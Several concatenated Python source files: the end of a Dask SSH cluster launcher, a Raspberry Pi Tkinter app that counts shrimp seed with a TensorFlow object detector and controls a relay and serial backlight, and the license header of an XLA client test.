print(bcolors.WARNING + 'Output will be redirected to logfiles '
'stored locally on individual worker nodes under "{logdir}".'.format(logdir=logdir)
+ bcolors.ENDC)
self.logdir = logdir
# Keep track of all running threads
self.threads = []
# Start the scheduler node
self.scheduler = start_scheduler(logdir, scheduler_addr,
scheduler_port, ssh_username, ssh_port,
ssh_private_key, remote_python)
# Start worker nodes
self.workers = []
for i, addr in enumerate(worker_addrs):
self.add_worker(addr)
@gen.coroutine
def _start(self):
pass
@property
def scheduler_address(self):
return '%s:%d' % (self.scheduler_addr, self.scheduler_port)
def monitor_remote_processes(self):
# Form a list containing all processes, since we treat them equally from here on out.
all_processes = [self.scheduler] + self.workers
try:
while True:
for process in all_processes:
while not process['output_queue'].empty():
print(process['output_queue'].get())
# Kill some time and free up CPU before starting the next sweep
# through the processes.
time.sleep(0.1)
# end while true
except KeyboardInterrupt:
pass # Return execution to the calling process
def add_worker(self, address):
self.workers.append(start_worker(self.logdir, self.scheduler_addr,
self.scheduler_port, address,
self.nthreads, self.nprocs,
self.ssh_username, self.ssh_port,
self.ssh_private_key, self.nohost,
self.memory_limit,
self.worker_port,
self.nanny_port,
self.remote_python,
self.remote_dask_worker))
def shutdown(self):
all_processes = [self.scheduler] + self.workers
for process in all_processes:
process['input_queue'].put('shutdown')
process['thread'].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
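# A minimal usage sketch; the addresses, username and key path are hypothetical.
# The context-manager form relies on __enter__/__exit__ above, and
# monitor_remote_processes() echoes remote output until interrupted with Ctrl-C.
if __name__ == '__main__':
    with SSHCluster('192.168.1.100', 8786,
                    worker_addrs=['192.168.1.101', '192.168.1.102'],
                    nthreads=4,
                    ssh_username='ubuntu',
                    ssh_private_key='/home/ubuntu/.ssh/id_rsa') as cluster:
        cluster.monitor_remote_processes()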
|
mainV2.py
|
import tkinter as tk
from tkinter import *
from tkinter import ttk
import tkinter.font as tkFont
from tkinter import messagebox
import numpy as np
import cv2
from PIL import Image, ImageTk
import threading
from datetime import datetime
import subprocess
import os
import time
import RPi.GPIO as GPIO
import tensorflow as tf
from object_detection.utils import label_map_util
import serial
ser = serial.Serial ("/dev/ttyS0",
baudrate = 38400,
parity = serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout = 1)
GPIO.setmode(GPIO.BCM)
# GPIO.BCM means we refer to pins by their "Broadcom SOC channel" number, i.e. the number after "GPIO" in the pin name
GPIO.setwarnings(False)
# Suppress warning messages that appear because the GPIO pins are not cleaned up properly when the program is interrupted
#DEFINE GPIO Relay Pins
relay = 21
relayState = False
GPIO.setup(relay, GPIO.OUT)
GPIO.output(relay, relayState)
# Set white as the default backlight color
light_default = ["@255$\n", "#255$\n", "&255$\n"]
for send in light_default:
print(send)
ser.write(send.encode())
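# Small helper documenting the backlight serial protocol (a sketch inferred from
# the commands sent in this file: '@', '#' and '&' select the red, green and
# blue channel, and '$' plus a newline terminates the value). It is not called
# anywhere; the sliders in Page1 below build the same strings inline.
def _send_backlight_rgb(red, green, blue):
    for prefix, value in (("@", red), ("#", green), ("&", blue)):
        ser.write("{}{}$\n".format(prefix, value).encode())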
# ------------------------------------------------------------------------------------------
# ------------------------------------------- detector class -------------------------------
class DetectorTF2:
def __init__(self, path_to_checkpoint, path_to_labelmap, class_id=None, threshold=0.5):
# class_id is list of ids for desired classes, or None for all classes in the labelmap
self.class_id = class_id
self.Threshold = threshold
# Loading label map
label_map = label_map_util.load_labelmap(path_to_labelmap)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=90, use_display_name=True)
self.category_index = label_map_util.create_category_index(categories)
tf.keras.backend.clear_session()
self.detect_fn = tf.saved_model.load(path_to_checkpoint)
def DetectFromImage(self, img):
im_height, im_width, _ = img.shape
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
input_tensor = np.expand_dims(img, 0)
detections = self.detect_fn(input_tensor)
bboxes = detections['detection_boxes'][0].numpy()
bclasses = detections['detection_classes'][0].numpy().astype(np.int32)
bscores = detections['detection_scores'][0].numpy()
det_boxes = self.ExtractBBoxes(bboxes, bclasses, bscores, im_width, im_height)
return det_boxes
def ExtractBBoxes(self, bboxes, bclasses, bscores, im_width, im_height):
bbox = []
for idx in range(len(bboxes)):
if self.class_id is None or bclasses[idx] in self.class_id:
if bscores[idx] >= self.Threshold:
y_min = int(bboxes[idx][0] * im_height)
x_min = int(bboxes[idx][1] * im_width)
y_max = int(bboxes[idx][2] * im_height)
x_max = int(bboxes[idx][3] * im_width)
class_label = self.category_index[int(bclasses[idx])]['name']
bbox.append([x_min, y_min, x_max, y_max, class_label, float(bscores[idx])])
return bbox
def DisplayDetections(self, image, boxes_list, det_time=None):
if not boxes_list: return image # input list is empty
img = image.copy()
for idx in range(len(boxes_list)):
x_min = boxes_list[idx][0]
y_min = boxes_list[idx][1]
x_max = boxes_list[idx][2]
y_max = boxes_list[idx][3]
cls = str(boxes_list[idx][4])
score = str(np.round(boxes_list[idx][-1], 2))
text = cls + ": " + score
cv2.rectangle(img, (x_min, y_min), (x_max, y_max), (0, 255, 0), 1)
cv2.rectangle(img, (x_min, y_min - 20), (x_min, y_min), (255, 255, 255), -1)
# cv2.putText(img, text, (x_min + 5, y_min - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
if det_time != None:
fps = round(1000. / det_time, 1)
fps_txt = str(fps) + " FPS"
cv2.putText(img, fps_txt, (25, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 0), 2)
return img
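# Illustrative helper (hypothetical, not called anywhere) showing how DetectorTF2
# is meant to be used; the model and labelmap paths mirror the ones configured
# further below in this file.
def _example_detect(image_path='data/1/1.jpg'):
    detector = DetectorTF2('models/faster-rcnn-resnet50-18000',
                           'models/Shrimp-seed-object_label_map.pbtxt',
                           threshold=0.3)
    img = cv2.imread(image_path)
    boxes = detector.DetectFromImage(img)
    return detector.DisplayDetections(img, boxes)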
# ------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------
# ------------------------------------------- tensor program -------------------------------
contrastValue = 30  # in percentages
# input frame from camera
def inputCam(source):
check = 0
cam = source
#if not cam.isOpened():
# messagebox.showerror("Error !", "Kamera tidak terhubung ! Harap memeriksa koneksi kamera ...")
# raise Exception("Could not open video device")
# return 0
cam.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)
#cam.set(cv2.CAP_PROP_AUTOFOCUS, 0)
ret, frame = cam.read()
#if ret == True:
# check = checkBacklight(frame)
# if(check < 16000):
# messagebox.showerror("Error !", "Backlight tidak menyala ! Harap memeriksa sambungan backlight ...")
# cam.release()
# return 0
return frame
# For preprocessing image
def make_image_square(filename):
img = cv2.imread(filename)
# Size of the image
#s = 640
# Creating a dark square with NUMPY
#f = np.zeros((s, s, 3), np.uint8)
# Getting the centering position
#ax, ay = (s - img.shape[1])//2, (s - img.shape[0])//2
# Pasting the 'image' in a centering position
#f[ay:img.shape[0]+ay, ax:ax+img.shape[1]] = img
#resize to 640x640
f = cv2.resize(img, (640,640), interpolation = cv2.INTER_AREA)
cv2.imwrite(filename, f)
def increaseContrast(img, precentage):
start = time.perf_counter()
image = img
contrast = precentage / 100
image = cv2.addWeighted(image, 1, image, contrast, 0)
stop = time.perf_counter()
print("finished adding contrast in " + str(round(stop-start, 2)) + " seconds")
return image
def crop_image():
for image_index in range(2):
folder_name = 'data/'
image_name = folder_name + str(image_index + 1) + '.jpg'
# ---------------- using simulation image -------------------
img = cv2.imread(image_name)
img = img[74:954,517:1397,:]
# ---------------- using video input -------------------
#img = inputCam(cv2.VideoCapture(0))
#cv2.imwrite(image_name, img)
h, w, c = img.shape
w_constant = w/2
h_constant = h/2
image_part_index = 0
for index_w in range(2):
for index_h in range(2):
start_width = int(w_constant * index_w)
end_width = int(w_constant * (index_w + 1))
start_height = int(h_constant * index_h)
end_height = int(h_constant * (index_h + 1))
current_index = image_part_index
# For training image set
# section_name = 'PL_8_' + str(image_index+1) + '_'
# file_name = section_name + str(image_index+1) + '_' + str(image_part_index) + '.jpg'
# For testing image set
section_name = str(image_index+1) + '/'
file_name = folder_name + section_name + \
str(image_part_index+1) + '.jpg'
crop_img = img[start_height:end_height, start_width:end_width]
crop_img = increaseContrast(crop_img, contrastValue)
image_part_index = image_part_index + 1
cv2.imwrite(file_name, crop_img)
make_image_square(file_name)
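# crop_image() above leaves eight 640x640 crops with boosted contrast in
# data/1/1..4.jpg and data/2/1..4.jpg, which detect_images() below feeds to the
# detection model.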
# For detection
def WriteFile(output_dir, file_name, content):
file_output = os.path.join(output_dir, file_name)
f = open(file_output, 'a+')
f.write(content)
f.close()
models = ['faster-rcnn-resnet50-18000']
threshold_setup = [0.3]
test_images_folders = ['1', '2']
# For detection
def DetectImagesFromFolder(detector, images_dir, save_output=False, output_dir='output/'):
total_detected = 0
timestamp2 = time.time()
for file in os.scandir(images_dir):
if file.is_file() and file.name.endswith(('.jpg', '.jpeg', '.png')) :
image_path = os.path.join(images_dir, file.name)
img = cv2.imread(image_path)
timestamp1 = time.time()
det_boxes = detector.DetectFromImage(img)
elapsed_time = round((time.time() - timestamp1) * 1000) #ms
img = detector.DisplayDetections(img, det_boxes)
total_detected = total_detected + len(det_boxes)
text_to_save = str(file.name) + ':\t' + str(len(det_boxes)) + ' benur detected' + '\t' + '[' + str(elapsed_time/1000) + ' s] \t\n'
if save_output:
img_out = os.path.join(output_dir, file.name)
cv2.imwrite(img_out, img)
WriteFile(output_dir, 'ResultLog.txt', text_to_save)
elapsed_time2 = round((time.time() - timestamp2) * 1000) #ms
now = datetime.now()
dt_string = now.strftime("%B %d, %Y %H:%M:%S")
    final_text_to_save = dt_string + ' with ' + str(contrastValue) + '% preprocessing contrast = ' + str(total_detected) + ' benur detected\t' + '[' + str(elapsed_time2/1000) + ' s] \n\n'
if save_output:
WriteFile(output_dir, 'Final.txt', final_text_to_save)
return total_detected
# For detection
def execute_tf(model_path, threshold, output_directory, labelmap_path, images_dir, id_list_data = None):
id_list = id_list_data
if id_list_data is not None:
id_list = [int(item) for item in id_list_data.split(',')]
save_output = True
if save_output:
if not os.path.exists(output_directory):
os.makedirs(output_directory)
# instance of the class DetectorTF2
detector = DetectorTF2(model_path, labelmap_path,
class_id=id_list, threshold=threshold)
result = DetectImagesFromFolder(
detector, images_dir, save_output=True, output_dir=output_directory)
return result
# For detection
def detect_images():
detected_total = np.array([])
for threshold in threshold_setup:
# Generate string for threshold output folder
threshold_str = str(threshold)
threshold_str = threshold_str.replace('.', '_')
for folder in test_images_folders:
# Generate string for output folder
folder_subname = folder.replace('/', '_')
for model in models:
# Generate output directory
output_directory = 'output_' + folder_subname + '_' + threshold_str
detection_model_path = 'models/' + model
detection_labelmap_path = 'models/Shrimp-seed-object_label_map.pbtxt'
detection_images_dir = 'data/' + folder
detection_output_dir = 'data/' + output_directory + '/' + model
detection_result = execute_tf(detection_model_path, threshold, detection_output_dir, detection_labelmap_path, detection_images_dir)
detected_total = np.append(detected_total, int(detection_result))
result = np.sort(detected_total)[::-1]
return int(result[0])
def calculate():
#=========== Detection Program here ========#
crop_image()
#=========== Should return the result ======#
detected_result = detect_images()
return detected_result
# ------------------------------------------------------------------------------------------
# additional function
def checkBacklight(frame):
    # backlight check: whether the LED is on or not, light intensity threshold - 50 per pixel
check = 0
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
for row in range(118, 138):
for column in range(118, 138):
check += gray[row][column]
return check
# ------------------------------------------------------------------------------------------
# --------------------------------------------- GUI Section --------------------------------
white = "#ffffff"
BlackSolid = "#000000"
font = "Constantia"
fontButtons = (font, 12)
maxWidth = 1024
maxHeight = 768
colorChoice = {'putih' : '$255,255,255$\n',
'kuning' : '$255,255,0$\n',
'hijau' : '$0,255,0$\n',
'biru' : '$0,255,255$\n',
'merah' : '$255,0,0$\n'}
def _from_rgb(rgb):
"""translate an rgb tuple to hex"""
return "#%02x%02x%02x" % rgb
class buttonL:
def __init__(self, obj, size, position, text,font, fontSize, hoverColor,command=None):
self.obj= obj
self.size= size
self.position= position
self.font= font
self.fontSize= fontSize
self.hoverColor= hoverColor
self.text= text
self.command = command
self.state = True
self.Button_ = None
def myfunc(self):
print("Hello size :" , self.size)
print("Hello position :" , self.position)
print("Hello font :" , self.font)
print("Hello fontSize :" , self.fontSize)
print("Hello hoverState :" , self.hoverColor)
def changeOnHover(self, obj,colorOnHover, colorOnLeave):
obj.bind("<Enter>", func=lambda e: obj.config(
background=colorOnHover))
obj.bind("<Leave>", func=lambda e: obj.config(
background=colorOnLeave))
def buttonShow(self):
fontStyle = tkFont.Font(family= self.font, size=self.fontSize,weight="bold")
self.Button_ = Button(self.obj,text = self.text, font=fontStyle, width = self.size[0], height = self.size[1], bg = self.hoverColor[1] if isinstance(self.hoverColor, list) == True else self.hoverColor, compound=TOP,command=self.command)
self.Button_.place(x=self.position[0],y=self.position[1])
if isinstance(self.hoverColor, list) == True:
self.changeOnHover(self.Button_, self.hoverColor[0], self.hoverColor[1])
else:
self.changeOnHover(self.Button_, self.hoverColor, self.hoverColor)
def stateButton(self,st):
self.st=st
if not self.Button_ == None:
self.Button_["state"]=self.st
def buttonUpdate(self, textUpdate = "", colorUpdate = "#fff"):
temp= [self.hoverColor[0], colorUpdate]
self.hoverColor = temp
self.Button_.config(text = textUpdate, bg = self.hoverColor[1] if isinstance(self.hoverColor, list) == True else self.hoverColor)
if isinstance(self.hoverColor, list) == True:
self.changeOnHover(self.Button_, self.hoverColor[0], self.hoverColor[1])
else:
self.changeOnHover(self.Button_, self.hoverColor, self.hoverColor)
class buttonImg:
def __init__(self, obj, imgDir, size, position, hoverColor, command=None):
self.obj= obj
self.imgDir= imgDir
self.size= size
self.position= position
self.hoverColor = hoverColor
self.command = command
self.state = True
self.Button_ = None
def changeOnHover(self, obj,colorOnHover, colorOnLeave):
obj.bind("<Enter>", func=lambda e: obj.config(
background=colorOnHover))
obj.bind("<Leave>", func=lambda e: obj.config(
background=colorOnLeave))
def buttonShow(self):
self.Button_ = Button(self.obj, width = self.size[0], height = self.size[1], bg = self.hoverColor[1] if isinstance(self.hoverColor, list) == True else self.hoverColor, bd = 10, highlightthickness=4, highlightcolor="#000", highlightbackground="#000", borderwidth = 4, compound=TOP, command=self.command)
self.Button_.place(x=self.position[0],y=self.position[1])
self.imageOpen = Image.open(self.imgDir)
self.imageOpen = self.imageOpen.resize((self.size[0],self.size[1]), Image.ANTIALIAS)
self.imageOpen = ImageTk.PhotoImage(self.imageOpen)
self.Button_.config(image=self.imageOpen)
if isinstance(self.hoverColor, list) == True:
self.changeOnHover(self.Button_, self.hoverColor[0], self.hoverColor[1])
else:
self.changeOnHover(self.Button_, self.hoverColor, self.hoverColor)
def stateButton(self,st):
self.st=st
if not self.Button_ == None:
self.Button_["state"]=self.st
def buttonUpdate(self, colorUpdate = "#fff"):
temp= [self.hoverColor[0], colorUpdate]
self.hoverColor = temp
self.Button_.config(bg = self.hoverColor[1] if isinstance(self.hoverColor, list) == True else self.hoverColor)
if isinstance(self.hoverColor, list) == True:
self.changeOnHover(self.Button_, self.hoverColor[0], self.hoverColor[1])
else:
self.changeOnHover(self.Button_, self.hoverColor, self.hoverColor)
class sliderLabel:
def __init__(self, obj, labelText, bgColor, labelPosition, labelFont, labelFontSize):
fontStyleLabel= tkFont.Font(family=labelFont, size=labelFontSize, weight = "bold")
redLabel = Label(obj, text=labelText, bg=bgColor, fg="#fff", font=fontStyleLabel)
redLabel.pack()
redLabel.place(x=labelPosition[0],y=labelPosition[1])
class logo:
def __init__(self, obj, imgDir, size, position, bg, command=None):
self.obj= obj
self.imgDir= imgDir
self.size= size
self.position= position
self.bg = bg
self.command = command
self.state = True
self.Button_ = None
def show(self):
self.logo = Button(self.obj, width = self.size[0], height = self.size[1], bg = self.bg, borderwidth = 0)
self.logo.place(x=self.position[0],y=self.position[1])
self.img = Image.open(self.imgDir)
self.img = self.img.resize((self.size[0],self.size[1]), Image.ANTIALIAS)
self.img = ImageTk.PhotoImage(self.img)
self.logo.config(image = self.img)
class framecontroller(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
#Graphics window
self.mainWindow = self
self.mainWindow.configure(bg=BlackSolid)
self.mainWindow.geometry('%dx%d+%d+%d' % (maxWidth,maxHeight,0,0))
self.mainWindow.resizable(0,0)
self.mainWindow.title("SHRICO")
self.mainWindow.attributes("-fullscreen", True)
# # creating a container
container = tk.Frame(self.mainWindow)
container.configure(bg=BlackSolid)
container.pack(side = "top", fill = "both", expand = True)
container.grid_rowconfigure(0, weight = 1)
container.grid_columnconfigure(0, weight = 1)
self.frames = {}
for F in (StartPage,Page1):
frame = F(container, self.mainWindow)
self.frames[F] = frame
frame.grid(row = 0, column = 0, sticky ="nsew")
self.show_frame(StartPage)
def show_frame(self, cont):
frame = self.frames[cont]
frame.tkraise()
class StartPage(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
self.relayState = False
self.relay = relay
self.ratarata=0
        # background
self.bg = Button(self, width = 1024, height = 768, fg = '#000', bg = '#000', borderwidth = 0)
self.bg.place(x=-2,y=0)
self.imageOpen = ImageTk.PhotoImage(Image.open('icon/tambak.jpg'))
self.bg.config(image=self.imageOpen)
# canvas
self.canvas = logo(self, 'icon/back.png', [975, 520], [20,70], bg = '#fff')
self.canvas.show()
# contain
fontStyleLabel= tkFont.Font(family="Arial", size=80)
self.label1 = Label(self, text="Jumlah Benih", bg='#c9e4e9', fg='#08272b', font=fontStyleLabel)
self.label1.pack()
self.label1.place(x=210,y=130)
self.shrico = logo(self, 'icon/logo.png', [220, 60], [0,0], bg = '#d4e4e8')
self.shrico.show()
self.pens = logo(self, 'icon/pens.png', [65, 55], [932,0], bg = '#d4e4e8')
self.pens.show()
self.sky = logo(self, 'icon/penssky.png', [215, 55], [714,0], bg = '#d4e4e8')
self.sky.show()
fontStyleLabel= tkFont.Font(family="Arial", size=180)
self.label2 = Label(self, text=" 0", bg='#c9e4e9', fg='#08272b', font=fontStyleLabel)
self.label2.pack()
self.label2.place(x=210,y=250)
fontStyle = tkFont.Font(family= "Arial", size=40,weight="bold")
self.button1 = buttonL(self,[15,2],[20,690],"Kalibrasi",fontStyle,15,["yellow",'#ddd'],lambda : [controller.show_frame(Page1)])
self.button1.buttonShow()
self.button2 = buttonL(self,[50,2],[20,602],"Hitung Benih",fontStyle,20,["#000",'#8ef695'],self.Waitcalculate)
self.button2.buttonShow()
self.button3 = buttonImg(self, 'icon/exit.png', [60,60], [920,685], ["#000", "#fff"], lambda : self.close())
self.button3.buttonShow()
def Waitcalculate(self):
self.relayState = not self.relayState
print(self.relayState)
GPIO.output(self.relay, self.relayState)
fontStyleLabel= tkFont.Font(family="Arial", size=20)
self.label3 = Label(self, text="Proses Sedang Berlangsung...", bg='#c9e4e9', fg='#08272b', font=fontStyleLabel)
self.label3.pack()
self.label3.place(x=50,y=90)
self.label2.configure(text=" ~")
fontStyleLabel= tkFont.Font(family="Arial", size=15)
self.now = datetime.now()
self.dt_string = self.now.strftime("%B %d, %Y %H:%M:%S")
self.label4 = Label( self, bg='#c9e4e9', fg='#08272b', font=fontStyleLabel)
self.label4.configure(text="Waktu:\n"+self.dt_string,justify="left")
self.label4.pack()
self.label4.place(x=50,y=530)
self.button1.stateButton("disabled")
self.button2.stateButton("disabled")
self.button3.stateButton("disabled")
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.tensorflow)
self.thread.start()
def tensorflow(self):
#================ Process ===================#
value = calculate()
self.ratarata = value
#============================================#
self.stopEvent.set()
self.Resultcalculate(self.ratarata)
def Resultcalculate(self,ratarata):
self.label3.configure(text="Proses Selesai...")
self.label2.configure(text= " " + str(ratarata))
self.button1.stateButton("active")
self.button1.buttonShow()
self.button2.stateButton("active")
self.button2.buttonShow()
self.button3.stateButton("active")
time.sleep(3)
self.label3.configure(text="")
self.relayState = not self.relayState
print(self.relayState)
GPIO.output(self.relay, self.relayState)
def close(self):
subprocess.run('sudo shutdown -h now', shell=True)
class Page1(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
self.videoObj = None
self.colorSelected = ''
self.backColor = "0,0,0"
self.cameraFlag = False
self.ledFlag = False
self.count = 0
self.relayState = False
self.relay = relay
self.configure(bg="#444")
fontStyle = tkFont.Font(family= "Arial", size=28, weight="bold")
fontStyleLabel = tkFont.Font(family = "Arial", size = 19)
# ---------------------- comboBox -------------------------
#self.selectColor = tk.StringVar()
#self.selectColor.set('putih')
#colorBox = ttk.Combobox(self, textvariable=self.selectColor, state = 'readonly', width = 27, font = 'Arial 25')
#colorBox['values'] = ('putih', 'kuning', 'hijau', 'biru', 'merah')
#colorBox.pack(ipadx = 15, pady = 25)
#colorBox.place(x= 10, y = 90)
#colorBox.bind('<<ComboboxSelected>>', self.colorSelect)
# ----------------------- slider ---------------------------
redLabel = sliderLabel(self, labelText="Merah", bgColor='#444', labelPosition = [255,50], labelFont = "Arial", labelFontSize = 21)
greenLabel = sliderLabel(self, labelText="Hijau", bgColor='#444', labelPosition = [550,50], labelFont = "Arial", labelFontSize = 21)
blueLabel = sliderLabel(self, labelText="Biru", bgColor='#444', labelPosition = [845,50], labelFont = "Arial", labelFontSize = 21)
self.redNow = tk.DoubleVar()
self.greenNow = tk.DoubleVar()
self.blueNow = tk.DoubleVar()
self.red = ttk.Scale(self, from_=0, length = 250, to=255, orient='horizontal', command=self.getRedColor, variable=self.redNow)
self.red.place(x=170,y=90)
self.green = ttk.Scale(self, from_=0, length = 250, to=255, orient='horizontal', command=self.getGreenColor, variable=self.greenNow)
self.green.place(x=460,y=90)
self.blue = ttk.Scale(self, from_=0, length = 250, to=255, orient='horizontal', command=self.getBlueColor, variable=self.blueNow)
self.blue.place(x=750,y=90)
self.redValue = Label(self, text="0", bg='#444', fg='#fff', font=fontStyleLabel)
self.redValue.place(x=270,y=120)
self.greenValue = Label(self, text="0", bg='#444', fg='#fff', font=fontStyleLabel)
self.greenValue.place(x=560,y=120)
self.blueValue = Label(self, text="0", bg='#444', fg='#fff', font=fontStyleLabel)
self.blueValue.place(x=850,y=120)
label1 = Label(self, text="Pastikan Wadah Benih\nUdang Terlihat Jelas\nMelalui Kamera", bg='#444', fg='#fff', font=fontStyleLabel)
label1.pack()
label1.place(x=730,y=180)
self.back = buttonImg(self,'icon/home.png', [130,130], [780,570], ["#000", "#fff"], lambda : [controller.show_frame(StartPage), videoStream.onClose(self.videoObj)])
self.back.buttonShow()
self.ledButton = buttonImg(self,'icon/sun.png', [80,80], [35,50], [BlackSolid,"#fff"], lambda : [self.ledState()])
self.ledButton.buttonShow()
self.button2 = buttonL(self,[16,2],[710,310],"Camera On",fontStyle,18,[BlackSolid,_from_rgb((244,239,140))],lambda : [self.cameraState()])
self.button2.buttonShow()
button3 = buttonL(self,[16,2],[710,450],"Record",fontStyle,18,[BlackSolid,_from_rgb((255,190,100))],lambda : [self.startRecord()])
button3.buttonShow()
self.videoObj = videoStream()
# If you use combobox
def colorSelect(self, event = None):
self.colorSelected = self.selectColor.get()
#print(self.colorSelected)
for color in colorChoice.keys():
if(self.colorSelected == color):
self.backColor = colorChoice.get(self.colorSelected)
print(str(colorChoice.get(self.colorSelected)))
ser.write(self.backColor.encode())
# If you use trackbar
def getRedColor(self, event = None):
self.redValue.configure(text= '{:d}'.format(round(self.redNow.get())))
self.backColor = str(round(self.redNow.get())) + "," + str(round(self.greenNow.get())) + "," + str(round(self.blueNow.get()))
sendRed = "@" + str(round(self.redNow.get())) + "$\n"
print(sendRed)
ser.write(sendRed.encode())
def getGreenColor(self, event = None):
self.greenValue.configure(text= '{:d}'.format(round(self.greenNow.get())))
self.backColor = str(round(self.redNow.get())) + "," + str(round(self.greenNow.get())) + "," + str(round(self.blueNow.get()))
sendGreen = "#" + str(round(self.greenNow.get())) + "$\n"
print(sendGreen)
ser.write(sendGreen.encode())
def getBlueColor(self, event = None):
self.blueValue.configure(text= '{:d}'.format(round(self.blueNow.get())))
self.backColor = str(round(self.redNow.get())) + "," + str(round(self.greenNow.get())) + "," + str(round(self.blueNow.get()))
sendBlue = "&" + str(round(self.blueNow.get())) + "$\n"
print(sendBlue)
ser.write(sendBlue.encode())
def cameraState(self, event = None):
self.cameraFlag = not(self.cameraFlag)
print(self.cameraFlag)
if(self.cameraFlag):
self.button2.buttonUpdate("Camera Off", _from_rgb((255,150,150)))
videoStream.onStart(self.videoObj, cameraFlag = self.cameraFlag)
else:
self.button2.buttonUpdate("Camera On", _from_rgb((244,239,140)))
videoStream.onStart(self.videoObj, cameraFlag = self.cameraFlag)
def ledState(self, event = None):
self.ledFlag = not(self.ledFlag)
print(self.ledFlag)
if(self.ledFlag):
self.relayState = not self.relayState
print(self.relayState)
GPIO.output(self.relay, self.relayState)
self.ledButton.buttonUpdate(_from_rgb((244,239,140)))
else:
self.relayState = not self.relayState
print(self.relayState)
GPIO.output(self.relay, self.relayState)
self.ledButton.buttonUpdate("#fff")
def startRecord(self, event = None):
self.count += 1
videoStream.onStart(self.videoObj, bgColor = self.backColor, recordCount = self.count, recordTime = 15, record = "yes")
class videoStream(tk.Frame):
def __init__(self):
self.ret = None
self.frame = None
self.thread = None
self.stopEvent = None
self.capWebcam = None
self.fourcc = None
self.out = None
self.time = datetime.now()
self.timeString = self.time.strftime("%d-%B-%Y %H:%M:%S")
self.now = None
self.check = 0
self.count = 0
self.panel = None
def onStart(self, bgColor = '255,255,255', recordCount = 0, recordTime = 1, record = "no", cameraFlag = False):
self.record = record
self.recordCount = recordCount
        self.recordTime = recordTime * 60 * 1000  # convert minutes to milliseconds
self.outVideo = "record/" + bgColor + " - " + self.timeString + "(" + str(self.recordCount) + ").mp4"
self.message = "perekaman video berdurasi " + str(recordTime) + " menit dimulai ..."
if((self.record == "no") and (cameraFlag == True)):
self.capWebcam = cv2.VideoCapture(0)
#if not self.capWebcam.isOpened():
# messagebox.showerror("Error !", "Kamera tidak terhubung ! Harap memeriksa koneksi kamera ...")
# raise Exception("Could not open video device")
self.capWebcam.set(3, 656)
self.capWebcam.set(4, 600)
#self.capWebcam.set(cv2.CAP_PROP_AUTOFOCUS, 0)
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.videoLoop)
self.thread.start()
elif(self.record == "yes"):
self.capWebcam = cv2.VideoCapture(0)
if not self.capWebcam.isOpened():
messagebox.showerror("Error !", "Kamera tidak terhubung ! Harap memeriksa koneksi kamera ...")
raise Exception("Could not open video device")
messagebox.showinfo("notification", self.message)
self.capWebcam.set(3,1920)
self.capWebcam.set(4,1080)
#self.capWebcam.set(cv2.CAP_PROP_AUTOFOCUS, 0)
self.fourcc = cv2.VideoWriter_fourcc(*'XVID')
self.out = cv2.VideoWriter(self.outVideo, self.fourcc, 5.0, (1920,1080))
self.prev = int(round(time.time() * 1000))
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.recordVideo)
self.thread.start()
else:
self.capWebcam.release()
def onClose(self):
print("[INFO] closing...")
if not self.panel == None:
self.panel.destroy()
self.stopEvent.set()
self.capWebcam.release()
def videoLoop(self):
try:
# keep looping over frames until we are instructed to stop
while not self.stopEvent.is_set():
self.ret,self.frame = self.capWebcam.read()
print(self.ret)
if(self.ret==True):
image = cv2.flip(self.frame, 1)
                    # backlight check: whether the LED is on or not, light intensity threshold - 30 per pixel
#self.check = checkBacklight(self.frame)
#if(self.check < 16000):
# messagebox.showerror("Error !", "Backlight tidak menyala ! Harap memeriksa sambungan backlight ...")
# self.capWebcam.release()
# break
#self.check = 0
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
# if the panel is not None, we need to initialize it
if self.panel is None:
self.panel = Label(image=image,width=660,height=550)
self.panel.image = image
self.panel.place(x=35,y=160)
# otherwise, simply update the panel
else:
if(not self.panel == None):
self.panel.configure(image=image)
self.panel.image = image
else:
self.panel.destroy()
self.capWebcam.release()
self.panel = None
except RuntimeError:
print("[INFO] caught a RuntimeError")
def recordVideo(self):
try:
# keep looping over frames until we are instructed to stop
while not self.stopEvent.is_set():
self.ret,self.frame = self.capWebcam.read()
if(self.ret==True):
image = cv2.flip(self.frame, 1)
                    # backlight check: whether the LED is on or not, light intensity threshold - 30 per pixel
#self.check = checkBacklight(self.frame)
#if(self.check < 16000):
# messagebox.showerror("Error !", "Backlight tidak menyala ! Harap memeriksa sambungan backlight ...")
# self.capWebcam.release()
# break
#self.check = 0
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
self.now = int(round(time.time() * 1000))
if(self.now - self.prev <= self.recordTime):
self.out.write(self.frame)
if self.panel is None:
self.panel = Label(image=image,width=660,height=550)
self.panel.image = image
self.panel.place(x=35,y=160)
# otherwise, simply update the panel
else:
if(not self.panel == None):
self.panel.configure(image=image)
self.panel.image = image
else:
self.now = 0
self.panel.destroy()
self.capWebcam.release()
self.panel = None
self.message = "Perekaman Selesai ..."
messagebox.showinfo("notification", self.message)
break
except RuntimeError:
print("[INFO] caught a RuntimeError")
app = framecontroller()
app.mainloop()
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
